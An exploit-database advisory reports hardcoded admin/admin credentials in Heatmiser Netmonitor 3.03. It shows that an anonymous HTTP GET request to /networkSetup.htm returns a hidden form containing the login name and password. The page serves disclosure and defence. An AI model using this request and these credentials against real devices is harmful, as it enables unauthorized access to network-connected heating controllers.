Heatmiser Netmonitor 3.03 Hardcoded Credentials

2019.12.31
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-798

# Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials # Date: 2019-12-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.heatmiser.com/en/ # Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf # Software: Netmonitor v3.03 # Product Version: Netmonitor v3.03 # CWE : CWE-798 # Vulenrability: Use of Hard-coded Credentials # CVE: N/A # Decription : # Hard-coded Credentials security vulnerability of Netmonitor model v3.03 # from Heatmiser manufacturer has been discovered. With this # vulnerability, the hidFrm form in the source code of the page # anonymously has access to hidden input codes. This information is # contained in the input field of the hidFrm form in the source code # lognm and logpd. HTTP GET Request : /networkSetup.htm HTTP/1.1 <form name="hidFrm" method="post"> <input type="hidden" name="lognm" value="admin"> <input type="hidden" name="logpd" value="admin"> <input type="hidden" name="ip" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="mask" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="gate" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="dns" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="timestr" value="04:27"> <input type="hidden" name="datestr" value="23/12/2019"> <input type="hidden" name="timeflag" ,="" value="0"> <input type="hidden" name="gmtflag" ,="" value="1"> </form>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top